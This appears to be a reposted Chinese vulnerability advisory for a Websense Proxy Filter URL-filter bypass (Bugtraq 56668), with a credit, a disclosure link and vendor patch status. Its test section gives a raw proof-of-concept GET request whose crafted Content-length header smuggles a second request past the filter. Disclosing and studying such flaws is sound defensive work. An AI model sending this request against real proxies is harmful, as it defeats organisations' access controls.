发布日期:2012-11-25
更新日期:2012-11-28受影响系统:
Websense Proxy Filter
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 56668Websense Proxy Filter是互联网访问管理系统,可监控、报告、管理内部互联网的使用。Websense Proxy Filter在实现上存在安全漏洞,可允许通过身份验证的用户成功绕过URL限制并访问未授权站点。远程Web服务器需要接受恶意构造的指定Content-length的GET请求。攻击者可以通过使用具有前述特性的Web代理服务器进行攻击,以完全绕过过滤器。只能通过GET请求进行绕过。<*来源:Nahuel Grisolia
链接:http://seclists.org/fulldisclosure/2012/Nov/171
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!====
GET www.facebook.com http/1.1
Accept: text/Html, application/xHtml+xml, */*
Accept-Language: es-AR
Cache-Control: no-cache
Content-length: 1GET ://OTHERURL/OTHEROTHER
a
====建议:
--------------------------------------------------------------------------------
厂商补丁:Websense
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.websense.com/global/en/Google Chrome 23.0.1271.91之前版本多个远程漏洞OpenBSD端口映射远程拒绝服务漏洞相关资讯 Websense 安全绕过漏洞 Websense安全漏洞
- Websense多个产品Settings模块凭证 (04/26/2014 18:42:13)
- Netgear SPH200D多个安全漏洞 (02/02/2013 07:26:29)
- Rockwell Automation ControlLogix (01/19/2013 09:26:45)
| - StarVedia IP Camera IC502w+安全 (03/29/2013 14:09:17)
- JBoss Enterprise Application (01/29/2013 10:15:58)
- Rockwell Automation ControlLogix (01/19/2013 09:22:12)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|
易网时代-编程资源站